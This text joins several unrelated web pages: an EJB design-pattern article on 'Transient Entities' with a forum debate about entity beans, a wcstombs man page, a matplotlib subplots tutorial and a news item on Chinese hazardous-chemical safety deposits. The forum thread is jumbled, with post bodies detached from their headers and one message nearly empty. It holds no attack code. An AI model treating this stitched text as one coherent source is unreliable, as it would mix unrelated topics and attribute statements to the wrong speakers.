Transient Entities are session beans that handle interaction with a datastore, generally a relational database. Because Transients are instantiated only as needed and exist only for the life of the session bean, significant load reductions can be seen. Transient Entities are essentially the architecture enforced when using Microsoft's COM+ model (COM+ has no Entity Bean equivalent).

Two types of Transient Entity are available for use: Conversational and Non-Conversational. Conversational Transients are modelled on Stateful Session Beans and exist for the lifetime of the client session. Data can therefore be cached in the Transient Entity, reducing the load on the underlying datastore. Conversely, Non-Conversational Transients exist only for the lifetime of the method call, so no data can be cached in the Entity itself. Non-Conversational Transients are the most efficient and scalable way of handling persistence in the application server (see Notes).

Transient Entities typically wrap both business logic and data, in a traditional OO model. However, Transients can also be modelled on Entity Beans and used as 'simple' data entity objects with no included business logic.

A typical Transient architecture has the following form:

Client -> TransientEntity -> Datastore

or this alternative ('pure data' Transient):

Client -> BusinessObject -> TransientEntity -> Datastore

Sample Code:

In this example our Account object is a Non-Conversational Transient Entity. We create an 'AccountModel' for our data (this is essentially the Value Object pattern for data transfer). This is an immutable object whose data is set on creation.
public class AccountModel implements Serializable {

    private String accountID = null;
    private String name = null;
    private String email = null;

    public AccountModel(String accountID, String name, String email) {
        this.accountID = accountID;
        this.name = name;
        this.email = email;
    }

    ...
    // create getters for each value
    ...
}

We create a remote interface for our EJB. In this case we are using AccountModel to encapsulate data for create and update, but we could explicitly pass the necessary parameters (or even use either strategy as need dictates).

public interface IAccount {

    // standard Transient create-read-update-delete methods
    public AccountModel create(AccountModel model) throws EJBException;
    public void delete(String id) throws EJBException;
    public AccountModel read(String id) throws EJBException;
    public void update(AccountModel model) throws EJBException;
}

The exceptions thrown should probably be extended to include more applicable and descriptive errors.

Now we implement the Session Bean itself. In this model we pass the AccountModel to a factory-based Data Access Object that handles the underlying JDBC implementation. This is similar to the approach used by the latest version of Sun's Petstore blueprint application.

public class AccountEJB implements SessionBean {

    public AccountModel create(AccountModel model) throws EJBException {
        try {
            IAccountDAO dao = AccountDAOFactory.getDAO();
            dao.create(model);
        } catch (Exception e) {
            // handle error
        }
        return model;
    }

    public void delete(String id) throws EJBException {}
    public AccountModel read(String id) throws EJBException {}
    public void update(AccountModel model) throws EJBException {}

    ...
    // remember to implement SessionBean inherited methods
    ...
}

The implementation of the IAccountDAO interface is a Data Access Object that handles the database interaction. In this implementation we are actually using a stored procedure within the database to handle the query itself. This keeps messy SQL out of our Java code.
public void create(AccountModel model) {

    CallableStatement stmt = null;
    ...
    Connection con = getDBConnection();
    String qry = "Account_Create (?, ?, ?)";
    stmt = con.prepareCall("{call " + qry + "}");
    stmt.setString(1, model.getID());
    stmt.setString(2, model.getName());
    stmt.setString(3, model.getEmail());
    stmt.executeUpdate();
    ...
}

The use of stored procedures is one of the major benefits of handling persistence manually. Significant performance benefit can be seen from using stored procedures effectively, as the database can optimise and cache the execution plan for the SQL statement. The client can then access the AccountEJB, calling the relevant methods as necessary.

Conversational Transients:

In a Conversational Transient, the AccountEJB would be a Stateful session bean and would hold a local instance of the AccountModel. This model is then reassigned as methods are called.

AccountModel model = null;

public AccountModel create(AccountModel model) throws EJBException {
    try {
        IAccountDAO dao = AccountDAOFactory.getDAO();
        dao.create(model);
        this.model = model;
    } catch (Exception e) {
        // handle error
    }
    return model;
}

Care must be taken in managing Conversational Transient Entities as there is a real danger of corrupting data. One technique is to set flags in the database: each data row carries a flag that marks locking, and all queries return only when this flag indicates the record is not locked. Other strategies are certainly possible.

Consequences:

Conversational Transients should only be used in cases where the existence of a client session precludes other sessions, applications or systems altering the underlying data. This generally means that when a Conversational Transient is used, some sort of locking mechanism should be in place for the underlying data. Failure to do so will result in possible data corruption, as cached data becomes stale and no longer accurately reflects the current state of the underlying database.
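The row-flag locking technique described above can be sketched in plain Java. The LockingStore class and its field names are illustrative assumptions, not part of the original design; a real implementation would keep the flag in a database column, e.g. UPDATE account SET locked = 1 WHERE id = ? AND locked = 0.

```java
import java.util.HashMap;
import java.util.Map;

// Illustrative in-memory model of flag-based row locking: a row can
// only be updated by a caller that first acquired its lock flag.
public class LockingStore {

    private static class Row {
        String value;
        boolean locked;          // the "lock flag" column
        Row(String value) { this.value = value; }
    }

    private final Map<String, Row> rows = new HashMap<>();

    public void insert(String id, String value) {
        rows.put(id, new Row(value));
    }

    // Corresponds to: UPDATE ... SET locked = 1 WHERE id = ? AND locked = 0
    public boolean tryLock(String id) {
        Row r = rows.get(id);
        if (r == null || r.locked) return false;
        r.locked = true;
        return true;
    }

    // An update succeeds only for the holder of the lock flag.
    public boolean update(String id, String newValue, boolean holdsLock) {
        Row r = rows.get(id);
        if (r == null || (r.locked && !holdsLock)) return false;
        r.value = newValue;
        return true;
    }

    public void unlock(String id) {
        Row r = rows.get(id);
        if (r != null) r.locked = false;
    }

    public String read(String id) {
        Row r = rows.get(id);
        return r == null ? null : r.value;
    }
}
```

The same check-flag-before-write discipline applies whether the flag lives in memory or in a database column; the important property is that a second session can neither acquire the lock nor write while the flag is set.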
Transient Entities are not as simple as CMP Entity Bean solutions, because all database interaction code must be produced manually. Although this can be reduced to some extent by developing appropriate reusable code, in some situations CMP Entity Beans are definitely of great benefit and should not be discounted out of hand.

In using a Transient architecture, the load on the database can be increased significantly, especially in cases where the majority of data interaction is read-only: each read involves another database call, whereas in an Entity Bean scenario data can be effectively cached in the application server.

Notes:

When describing Transients as the most efficient means of handling persistence in the ~application server~, that is exactly what I am talking about: the application server itself. Entity Beans obviously increase the demand on the application server. In a Transient architecture this demand is pushed to the database, and the load on the database is therefore increased significantly. That said, RDBMS systems have had over 20 years to refine their strategies for handling large numbers of concurrent transactions. This fact can be exploited in a large-scale system by relying more heavily on the database to handle persistence. The ability to separate the physical database from the application server further increases the power of this type of model. COM+ exhibits the ability to scale at least as well as similar EJB solutions without using Entity Beans, so the model is definitely workable.
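The AccountDAOFactory referenced in the sample code is not shown. A minimal sketch of what such a factory might look like follows; the factory wiring and the in-memory InMemoryAccountDAO are illustrative assumptions (a real version would read the DAO class name from configuration and return a JDBC-backed implementation).

```java
import java.io.Serializable;
import java.util.HashMap;
import java.util.Map;

// Hypothetical factory returning an IAccountDAO implementation.
public class AccountDAOFactory {

    // Minimal DAO contract mirroring the article's CRUD methods.
    public interface IAccountDAO {
        void create(AccountModel model);
        AccountModel read(String id);
        void update(AccountModel model);
        void delete(String id);
    }

    // Immutable value object, as in the article.
    public static class AccountModel implements Serializable {
        private final String accountID;
        private final String name;
        private final String email;

        public AccountModel(String accountID, String name, String email) {
            this.accountID = accountID;
            this.name = name;
            this.email = email;
        }

        public String getID() { return accountID; }
        public String getName() { return name; }
        public String getEmail() { return email; }
    }

    // In-memory stand-in for the JDBC/stored-procedure DAO.
    static class InMemoryAccountDAO implements IAccountDAO {
        private final Map<String, AccountModel> table = new HashMap<>();
        public void create(AccountModel m) { table.put(m.getID(), m); }
        public AccountModel read(String id) { return table.get(id); }
        public void update(AccountModel m) { table.put(m.getID(), m); }
        public void delete(String id)      { table.remove(id); }
    }

    private static final IAccountDAO INSTANCE = new InMemoryAccountDAO();

    public static IAccountDAO getDAO() {
        return INSTANCE;
    }
}
```

Swapping the InMemoryAccountDAO for a JDBC implementation (as in the stored-procedure example above) requires no change to the session bean, which is the point of routing all access through the factory.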
Transient Entity (18 messages)

Threaded Messages (18)

- Transient Entity by David Churchville on August 19 2001 15:46 EDT
- Transient Entity by David Churchville on August 19 2001 15:52 EDT
- Transient Entity by Cameron Purdy on August 20 2001 17:08 EDT
- Transient Entity by Toby Hede on August 23 2001 20:09 EDT
- Anecdotes by Cameron Purdy on August 23 2001 09:35 EDT
- Roll-your-own Entity Beans by phil bradley on September 04 2001 02:57 EDT
- Anecdotes by Jesse Beaumont on September 26 2002 08:04 EDT
- Transient Entity by N K on August 31 2001 09:40 EDT
- Transient Entity by Nick Minutello on August 31 2001 08:16 EDT
- Transient Entity by Yi Lin on September 06 2001 03:37 EDT
- Transient Entity by Cameron Purdy on September 07 2001 11:33 EDT
- Transient Entity by John Harby on December 10 2001 09:58 EST
- Transient Entity by amitabh gupta on October 11 2001 09:46 EDT
- Entity Beans by simon wenham on September 20 2001 11:41 EDT
- Transient Entity by Roman Stepanenko on August 21 2001 13:48 EDT
- Transient Entity by Toby Hede on August 21 2001 20:29 EDT
- Transient Entity by Roman Stepanenko on August 22 2001 01:37 EDT
- Transient Entity by John Carbone on May 02 2002 19:22 EDT

Transient Entity

Posted by: David Churchville - Posted on: August 19 2001 15:46 EDT - in response to Toby Hede

I like this pattern, and it makes sense for those not opting to use CMP beans in a read-mostly application. The only issue is that it doesn't support caching of frequently accessed data, which I almost always have to do. One strategy to use with this pattern is to implement a caching layer using a Business Delegate: use a Java class to wrap access to a session bean that returns read-mostly data, let the Java class cache results after first calling the session bean, and return the cached data otherwise. If used in a Servlet/Web context, this Java class can be stored as an application object for "global" data, or in the session context for user-specific data.
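Churchville's caching Business Delegate can be sketched in a few lines. The CachingDelegate name and the Function-based loader are assumptions for illustration; in the real pattern the loader would be a call through the session bean's remote interface.

```java
import java.util.HashMap;
import java.util.Map;
import java.util.function.Function;

// Sketch of a caching Business Delegate: a plain Java class that wraps
// a (simulated) session-bean call and caches read-mostly results.
public class CachingDelegate<K, V> {

    private final Function<K, V> sessionBeanCall; // stand-in for the remote call
    private final Map<K, V> cache = new HashMap<>();
    private int remoteCalls = 0;                  // for observing cache hits

    public CachingDelegate(Function<K, V> sessionBeanCall) {
        this.sessionBeanCall = sessionBeanCall;
    }

    // First access goes to the "session bean"; later accesses hit the cache.
    public V get(K key) {
        return cache.computeIfAbsent(key, k -> {
            remoteCalls++;
            return sessionBeanCall.apply(k);
        });
    }

    public int getRemoteCallCount() { return remoteCalls; }
}
```

Storing one such delegate in the servlet application scope gives the "global" cache Churchville describes; storing one per HTTP session gives the user-specific variant.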
Transient Entity

Posted by: David Churchville - Posted on: August 19 2001 15:52 EDT - in response to David Churchville

I should have specified that this strategy applies to the "non-conversational" version of your pattern. The conversational version supports caching, naturally. Another thing I noticed: you don't actually mention queries here, just CRUD data access. I assumed (maybe incorrectly) that you would add query methods to the Transient objects? That's the whole basis for my caching discussion: not the caching of individual entities, but of collections.

Transient Entity

Posted by: Cameron Purdy - Posted on: August 20 2001 17:08 EDT - in response to Toby Hede

Toby: "Anecdotal evidence suggests that many developers remain skeptical about the value of Entity Beans, especially prior to the EJB 2.0 specification. Many system designers and developers choose not to invest precious resources in a technology that remains unproven in large scale deployments."

I am not sure where you collect anecdotal evidence, but I can assure you that it is fundamentally invalid. Most of the companies that I have worked or spoken with over the past year have based their transactional data models in their new J2EE applications entirely on entity EJBs. These include, for example, most of the major financial institutions on the east coast and several of the largest in Europe. I do not wish to discourage you from developing high performance patterns for EJB development. I simply encourage you to avoid prefixing your thoughts (and thus devaluing them) with irrelevant statements.

Peace,
Cameron.
Some of the reports I read from JavaOne concurred that the general trend seemed to be away from Entity Beans, including this report from IBM: "A practical tidbit that was commonly spouted by a number of different speakers was that real performance came only in minimizing (if not outright banning) the use of Entity beans. Ah, what a difference a year makes!" () And there are recent examples of such discussion on the server side as well. In my travels as a developer I have talked with any number of people, and a significant number suggest that Entity Beans need serious consideration. I swear my anecdotal evidence has to be as good as yours!

Anecdotes

Posted by: Cameron Purdy - Posted on: August 23 2001 21:35 EDT - in response to Toby Hede

> I find it amusing, to say the least, that you counter my
> anecdotal evidence with anecdotal evidence of your own.

Yes, yes, but at least they aren't analogies. That would be more like the pot calling the kettle black. ;-)

I've heard a lot of concerns about entity beans. These concerns usually fall into two categories:

1) My entity beans are slow, how do I speed them up?

2) I've never written an entity bean nor used one nor seen one, but I think that they are slow. I'm going to do (x, y or z) instead because it is faster.

Question number two is a bit odd IMHO, and falls into the same category as comparing the speed of Java with C++, arguing whether Macs are better than PCs, or arguing whether Unix is better than Windows. Of course a Mac running Java on Unix is fast; Macs are supercomputers after all.

I do like question number one. The answer to question number one is sometimes that the EJBs are being used where they are arguably inappropriate, for example for set-oriented database access used in page construction, or in reporting. Entity EJBs excel at serving as a transactional data model, which means that as the target of business operations, they work well.
Entity EJBs are worst at set-based operations, particular with object-to-object navigation. Even with optimizations (such as Gene Chuang's fat-key), if a second operation is done across an optimized iteration, the result becomes O(n^2) instead of O(n). For example: for each EJB in home.find() invoke EJB.method() which goes to a related entity (e.g. getting vendor names from a vendor ejb for each selected stock item ejb) The fat-key optimization on 1,000 EJBs results in a total of one select on the first EJB (e.g. stock items) but then up to 1,000 selects will occur as vendor names are loaded using the vendor id foreign key in the stock item. You can only make the EJBs so non-granular (in this case, denormalized), for example using a join to load the vendor name as part of the stock item, but each time you employ this optimization, you increase the cost of using the EJB in every case in order to optimize some set of uses. You also increase your chance of having stale data within a tx because you have data on an EJB which is not responsible for its being updated. As a result, for reporting or massive page-gen purposes, both of which are almost always non-transactional in nature, it makes sense to use mechanisms other than an entity EJB as the means for database access. Early optimization is the root of all evil. I've found that developing entirely with an entity EJB data access layer then optimizing read-only operations works pretty well. First of all it validates and fleshes out the data model design relatively quickly. Secondly, it insulates the app code from db changes because I know what has to get updated when parts of the db change. Lastly, it works early on, and it typically does not work slowly in development (i.e. a single user hitting a local database). 
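Cameron's N+1 example is easy to simulate without any EJB machinery. The sketch below (hypothetical table and method names, with plain Python standing in for the container) just counts the query traffic that the fat-key-optimized iteration would generate:

```python
# Simulates the N+1 access pattern: one select for the stock items,
# then one select per item to resolve the vendor name by foreign key.
queries = []

def find_stock_items():
    # stands in for home.find() with the fat-key optimization (1 select)
    queries.append("SELECT * FROM stock_item")
    return [{"id": i, "vendor_id": i % 10} for i in range(1000)]

def vendor_name(vendor_id):
    # stands in for the per-entity lookup on the vendor EJB
    queries.append("SELECT name FROM vendor WHERE id = %d" % vendor_id)
    return "vendor-%d" % vendor_id

names = [vendor_name(item["vendor_id"]) for item in find_stock_items()]
# total round trips: 1 (items) + 1000 (vendor names)
```

With 1,000 stock items the counter ends at 1,001 statements, which is exactly the O(n) query growth the post describes.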
The difficult choices in optimization are typically found in one of two categories: 1) Read-only access, typically to build a response page, that hits a handful of EJBs but could be done several times as optimally with direct JDBC etc. These are hard calls because they are borderline -- not too expensive, but certainly worse than they could be. 2) Large transactional operations, particularly ones that you know will grow as the data volume in the application grows. Often these are batch-like or periodic processes. Take the stock item / vendor concept as one type of problem ... if that type of object navigation must occur on a large number of EJBs in a single transaction, it is a real resource hog. These types of transactions are rare in most applications, and deserve special care in optimization. If possible, just comment out the use of the tx data model (EJBs) and do as much work as possible on the db side in a few set-oriented SQL DML statements. Leave the EJB code as documentation that describes how the object model is affected. I have discussed several potential solutions with EJB developers, but the problem is how can the EJB developer or container implementor (for CMP) predict what data needs to be prefetched? In other words, how can 1,000 ejbFindByPk calls be optimized in advance into a single select? Is that something the EJB developer needs to code? Declare? Is it something the container needs to guess? Use AI to figure out? If this particular question could be answered, entity EJBs in read-only uses could be as fast as custom O/R approaches. You know the ones that I'm referring to. In summary, there are issues with entity EJBs that are a grey area for the performance question. That doesn't make entity EJBs any more evil than any other technology -- each has (or at least most seem to have) a purpose in life. I would have designed the entity EJB specification much differently than "they" did, but hey, they didn't bother to ask any of us now did they? 
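One common answer to the "how do 1,000 ejbFindByPk calls become a single select" question is to collect the foreign keys first and issue one set-oriented IN query. A minimal sketch with sqlite3 (hypothetical vendor schema, not container-generated code):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE vendor (id INTEGER PRIMARY KEY, name TEXT)")
conn.executemany("INSERT INTO vendor VALUES (?, ?)",
                 [(i, "vendor-%d" % i) for i in range(10)])

# Instead of one findByPrimaryKey call per item, gather the keys and
# issue a single select, then resolve each item from the result set.
wanted = [1, 3, 3, 7, 9]                      # foreign keys from the items
unique = sorted(set(wanted))
placeholders = ",".join("?" * len(unique))
rows = conn.execute(
    "SELECT id, name FROM vendor WHERE id IN (%s)" % placeholders, unique
).fetchall()
by_id = dict(rows)
names = [by_id[k] for k in wanted]            # per-item lookup, zero extra selects
```

The batching itself is trivial; the hard part Cameron raises is how a container would know, before the loop runs, that these keys are about to be fetched.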
;-) So let's look for the good in this particular pile. BTW - I wasn't trying to say that your optimization idea was bad. I think it is pretty cool that you are working to figure out faster / better ways of getting data, with or without using entity EJBs. I just didn't want people to accumulate one more unchallenged anecdote that led them to believe that entity EJBs were unusable, slow, despised by all developers and a complete failure. Peace, Cameron. Roll-your-own Entity Beans[ Go to top ] I mostly agree with Cameron's post. - Posted by: phil bradley - Posted on: September 04 2001 02:57 EDT - in response to Cameron Purdy A couple of additional points. Your Transient beans look to me like your own version of entity beans without the good bits. You admit they can't handle concurrency, and you must implement your own explicit locks - not nice! Entity beans were introduced as a safe OO persistence mechanism and to support shared access to data. Nothing about support for queries! One common problem is that people confuse persistence with data access. Most queries are not persistent operations and hence should not be performed through entity beans. (Isolation issues ignored!) Entity beans are widely used, notwithstanding the limitations of some vendors' implementations, because they are safe and scalable. No hard-to-debug JDBC code! Guaranteed concurrency and transactional safety. BTW, the optimisation advice - "Rule 1: Don't do it. Rule 2: If you must do it, then don't do it yet" - is a quote from Michael Jackson, the British systems guru. Phil Bradley Anecdotes[ Go to top ] Being new to the world of EJBs, we are currently starting a new project which will involve the collection of data in XML format to be processed in batch, as well as a set of online screens for direct data entry. The plan is for the two to share the same business layer in order to minimise the maintenance costs.
- Posted by: Jesse Beaumont - Posted on: September 26 2002 08:04 EDT - in response to Cameron Purdy Because of the inefficiencies of making multiple distinct calls to EJBs due to the JNDI lookup resolution, the plan is to make the EJBs fairly rough grained so they can handle large datasets if necessary but be scaled down to a single transaction as well. Based on your post regarding the relative pros and cons of Entity beans do you think there is a way to make entity beans perform this sort of dual role resonably efficiently. My current thinking is no, though I have had only very little time to experiment with them and probably, due to time constraints wont have that time. Jesse Transient Entity[ Go to top ]. - Posted by: N K - Posted on: August 31 2001 09:40 EDT - in response to Toby Hede Transient Entity[ Go to top ] Posted by N K 2001-08-31 08:40:55.0. - Posted by: Nick Minutello - Posted on: August 31 2001 20:16 EDT - in response to N K . ... which is fine. However, it is not the point of the previous argument that Cameron was presenting. The point is to use entity beans where they make sense. If a particular "entity" is not going to be a performance bottle-neck - make it an entity bean. It is *usually* quite a bit quicker to code a CMP bean than to implement a BMP bean - or its java-classes-wrapping-jdbc solution. It is certainly far more flexible and a lot easier to maintain. If the access to the data is transactional, again look very hard at making it an entity. If it is largely read-only (and it is a result-set, page generation data access) AND the perfomance has proven to be an issue having *already* tried entity beans, then look at using stateless session beans and JDBC. The big point is to follow the 3 steps in optimisation (this is patently a stolen quote;): 1) Dont do it 2) Dont do it yet 3) Now that you have waited and are sure you have no choice, try one last time to talk youself out of it. 
Maintainability of code (read: simplicity) is far more important than performance. An interesting observation: + A lot of IBM consultants are proponents of this JDBC-wrapped classes, using session beans as a facade pattern. + IBM Websphere has been regularly complained about for poor entity bean performance. I wonder which is the cause and which is the effect - which is the chicken/egg if you like? Transient Entity[ Go to top ] What's new in this "pattern"? Isn't this essentially the old straightforward way that everyone was doing before there is entity bean? - Writing your DB access code to get data into Java (or C++...) object so you can used it. What's new about it? Am I missing something? - Posted by: Yi Lin - Posted on: September 06 2001 15:37 EDT - in response to N K > Posted by N K 2001-08-31 08:40:55.0. >. OK, but why? Is that because no one in your institution really understands entity bean and ever used it? Maybe your team is missing out something very productive. I am a supporter of entity bean because: 1. Entity bean (the entire app business as well) is NOT only about performance. It is also about "not reinventing the wheel" and productivity (I don't know about you, but I hate writing time-consuming and boring JDBC/SQL code). If performance is the only important thing, why aren't we still write tight fast assembly code today? 2. Entity bean can be optimized, either by better app server implemention and configuration. After all, reading data from memory (bean) is faster than from DB. (I admit for a particular server using certain configuration, it can cause EJB to load data from DB on every call, it nullifies entity bean advantage. Also EJB does not support fast bulk data retrieval.) To me, entity bean is one generation ahead of this "pattern" and ahead of COM+ as well in this aspect. Transient Entity[ Go to top ] The "ML on the east coast Websphere project without entities" is only one of many Java projects at ML. 
AFAIK Most new Java projects at ML are targeted at Weblogic, since ML chose Weblogic as its standard enterprise application platform. It's not surprising that an old Websphere project would NOT use entity beans, since Websphere barely (or "almost", or "kind of") supported CMP 1.0, for example. - Posted by: Cameron Purdy - Posted on: September 07 2001 11:33 EDT - in response to Yi Lin Transient Entity[ Go to top ] It would be interesting to see some hard statistics on this issue. The world is too large for arguments based on such small sample spaces. - Posted by: John Harby - Posted on: December 10 2001 21:58 EST - in response to Cameron Purdy Transient Entity[ Go to top ] Yi Lin - Posted by: amitabh gupta - Posted on: October 11 2001 21:46 EDT - in response to Yi Lin If u don't agree with somebody's view, that does not give u the right to trash him/her. Doing so only gives a bad impression about yourself. As regards to Entity Beans, there can be many real life situations where using Entity Beans provides no advantage. One of them is clustering. In a clustered environment, the App server does not cache the bean and reads it afresh from database everytime it is accessed, and as such you lose a big advantage of entity beans. Cameron admits that entity beans are not good where relational data needs to be accessed. Most real life applications will have entity beans that are related to a collection of other entity beans. Simple example is custmer to orders, and orders to line-items. If EBs cannot be used even in such a simple example, where else can they be ? I think EBs are an overhyped patterns, that are popular among people who hate to interact with Database or write a SQL, and prefer the entity bean to do that for them, magically. But behind the covers, entity bean does the same stuff but in a very ugly fashion, since it accesses the databse in a generic way as against your own SQL which would do precisely what you want to do. 
Toby has a good point, and it should not be rejected as views of people who don't know EBs. There is nothing difficult abt implementing EBs, especially if u r already comfortable with their less costly cousins, the session beans. But because you have a tool, u don't have to use it. Its use must be justified too. Thanks Entity Beans[ Go to top ] We, reluctantly, used them to comply with the J2EE standards, as recommended by the consultants we employed. - Posted by: simon wenham - Posted on: September 20 2001 11:41 EDT - in response to Cameron Purdy Our data is mainly client account specific so there is no need to cache the data between sessions. We have to maintain a history of the transactional data so we only perform queries and inserts so the use of entity EJB's was definitely a sledgehammer to crack a nut. I am a great believer in horses for courses and not a purist so I think we used the wrong technology for this particular application. Transient Entity[ Go to top ] Your solution is not transactional. You can add tx behavior but that would make really ugly implementation and effectively you will repeat functionality of ejb container (in a very buggy manner). That's why people use entity beans. - Posted by: Roman Stepanenko - Posted on: August 21 2001 13:48 EDT - in response to Toby Hede Transient Entity[ Go to top ] When I deply my Transient Entity, I simply declare the methods as Transaction Required in the deployment descriptor. In JBoss (my app server of choice), at least, this lets the container manage the transactions. I have tested this with several techinques including nested calls across multiple methods and the transactions do work. - Posted by: Toby Hede - Posted on: August 21 2001 20:29 EDT - in response to Roman Stepanenko Transient Entity[ Go to top ] When I mean transactional I not only mean propagation. If there is an exception during saving the state, then your objects will not be refreshed automatically. 
You will have to provide the code which will be buggy and unreliable. - Posted by: Roman Stepanenko - Posted on: August 22 2001 13:37 EDT - in response to Toby Hede Transient Entity[ Go to top ] I would like to see some studies with imperical evidence - Posted by: John Carbone - Posted on: May 02 2002 19:22 EDT - in response to Toby Hede as oppopsed to anecdotal. Are there any of these out there?
http://www.theserverside.com/discussions/thread.tss?thread_id=8536
Provided by: manpages-dev_3.35-0.1ubuntu1_all

NAME
       wcstombs - convert a wide-character string to a multibyte string

SYNOPSIS
       #include <stdlib.h>

       size_t wcstombs(char *dest, const wchar_t *src, size_t n);

DESCRIPTION
       If dest is not a NULL pointer, the wcstombs() function converts the wide-character string src to a multibyte string starting at dest. At most n bytes are written to dest. The conversion stops when the terminating null wide character has been converted, when the n-byte limit is reached, or when a wide character is encountered that cannot be represented in the current locale.

RETURN VALUE
       The wcstombs() function returns the number of bytes that make up the converted part of the multibyte string, not including the terminating null byte. If a wide character was encountered which could not be converted, (size_t) -1 is returned.

CONFORMING TO
       C99.

NOTES
       The behavior of wcstombs() depends on the LC_CTYPE category of the current locale.

       The function wcsrtombs(3) provides a thread safe interface to the same functionality.

SEE ALSO
       mbstowcs(3), wcsrtombs(3)

COLOPHON
       This page is part of release 3.35 of the Linux man-pages project. A description of the project, and information about reporting bugs, can be found at http://www.kernel.org/doc/man-pages/.
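As a rough illustration of the signature above, wcstombs() can be exercised from Python via ctypes. This is a sketch, not part of the man page: it assumes a Unix-like system where the C library can be located, and that the default C locale is active, in which each ASCII wide character converts to one byte.

```python
import ctypes
import ctypes.util

# Load libc; fall back to the common glibc soname if find_library fails.
libc = ctypes.CDLL(ctypes.util.find_library("c") or "libc.so.6")
libc.wcstombs.restype = ctypes.c_size_t   # size_t return, per the synopsis

dest = ctypes.create_string_buffer(64)    # room for the multibyte result
n = libc.wcstombs(dest, ctypes.c_wchar_p("hello"), ctypes.c_size_t(64))
# n is the number of bytes written, excluding the terminating null byte
```

Had a wide character been unconvertible, n would compare equal to (size_t) -1 instead of a byte count.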
http://manpages.ubuntu.com/manpages/precise/man3/wcstombs.3.html
Subplots Tips and Tricks

Typically, one of your first steps when you're doing data viz in matplotlib is to make a blank canvas to draw on. This of course returns a Figure object and an Axes object.

    %pylab inline

    Populating the interactive namespace from numpy and matplotlib

    fig, ax = plt.subplots()

And if you're interested in making multiple plots together in the same figure, you pass in nrows and ncols arguments to instead make the second return value an array of Axes objects.

    fig, axes = plt.subplots(1, 2, figsize=(10, 4))

However, this can get unwieldy when dealing with a large number of rows and columns, not only from an aesthetic standpoint, but also from a "How do I put my visualization into the cell I want?" standpoint.

    fig, axes = plt.subplots(10, 10)

Our Data

We have a .csv on hand that looks at the distribution of where letters occur in popular English words. It's got a column for each letter and 15 rows of data.

    import pandas as pd

    df = pd.read_csv('../data/letterDists.csv')
    df.head()

    5 rows × 26 columns

Iterating Through Each Figure

Conceptually, we want to simultaneously iterate through each column of data and through each of our axes, making a plot at each step along the way. Simultaneous iteration should set off the zip alarm in your head, and by using the axes.flatten() method, we don't have to go through the hassle of nested for loops to deal with a variable number of rows and columns in our figure.

    fig, axes = plt.subplots(5, 6, figsize=(16, 8))

    for col, ax in zip(df.columns, axes.flatten()):
        ax.bar(df.index, df[col])
        ax.set_title(col)

Spacing Out

But this is pretty cluttered. Thankfully, we can use the subplots_adjust function to tune the layout of each subplot.
Specifically, we're going to modify the wspace and hspace arguments, which are defined in the docs as the amount of height/width "reserved for space between subplots, expressed as a fraction of the average axis" height/width. The size of the subplots themselves will scale to fill the rest of the figure automatically.

    fig, axes = plt.subplots(5, 6, figsize=(16, 8))

    for col, ax in zip(df.columns, axes.flatten()):
        ax.bar(df.index, df[col])
        ax.set_title(col)

    plt.subplots_adjust(wspace=.5, hspace=.5)

Cleaning Up Remainder

Finally, we made a 5x6 figure because 26 doesn't divide evenly into a 5x5 or a 4x6 grid. However, as a result, those last 4 empty cells detract from the rest of the figure. We can delete them manually using the fig.delaxes() function, specifying each cell to delete.

    fig, axes = plt.subplots(5, 6, figsize=(16, 8))

    for col, ax in zip(df.columns, axes.flatten()):
        ax.bar(df.index, df[col])
        ax.set_title(col)

    plt.subplots_adjust(wspace=.5, hspace=.5)

    fig.delaxes(axes[4, 2])
    fig.delaxes(axes[4, 3])
    fig.delaxes(axes[4, 4])
    fig.delaxes(axes[4, 5])

But this can be tedious and makes for bloated, repetitive code. Instead, consider the following trick, which uses:

- The enumerate() function to figure out where the iteration left off
- The else statement after a for loop to hide every remaining subplot in the figure

    fig, axes = plt.subplots(5, 6, figsize=(16, 8))

    for idx, (col, ax) in enumerate(zip(df.columns, axes.flatten())):
        ax.bar(df.index, df[col])
        ax.set_title(col)
        plt.subplots_adjust(wspace=.5, hspace=.5)
    else:
        [ax.set_visible(False) for ax in axes.flatten()[idx+1:]]
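A quick way to convince yourself the zip/enumerate/else machinery behaves: zip stops at the shorter of its two inputs (26 columns vs. 30 cells), and the else clause runs after the loop completes, with idx still bound to the last index. A plain-Python sketch of that control flow, no matplotlib required:

```python
columns = [chr(c) for c in range(ord('a'), ord('z') + 1)]  # 26 "columns"
cells = list(range(5 * 6))                                 # 30 grid "cells"

plotted = []
for idx, (col, cell) in enumerate(zip(columns, cells)):
    plotted.append((col, cell))      # stand-in for ax.bar(...) per cell
else:
    hidden = cells[idx + 1:]         # the leftover cells to hide

# zip stopped after 26 pairs, leaving 4 unused cells in `hidden`
```

Swap the stand-ins for ax.bar and ax.set_visible(False) and you have the figure-building loop above.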
https://napsterinblue.github.io/notes/python/viz/subplots/
03 August 2006 12:14 [Source: ICIS news] Small enterprises will need to place deposits of at least CNY300,000 while deposits for medium-sized firms are set at a minimum of CNY1m, the State Administration of Work Safety said in a statement on its Web site. Large-scale companies will need to pay at least CNY1.5m while super large-scale firms will have to pay at least CNY3m, it added, but it did not say how companies will be categorised. The deposits should not be more than CNY5m, it said. The new regulation takes effect on 1 August. Companies will have to pay to take care of the aftermath of accidents, and the deposits will be used to cover any shortfalls.
http://www.icis.com/Articles/2006/08/03/1082604/china+asks+harzardous+chem+producers+for+deposit.html
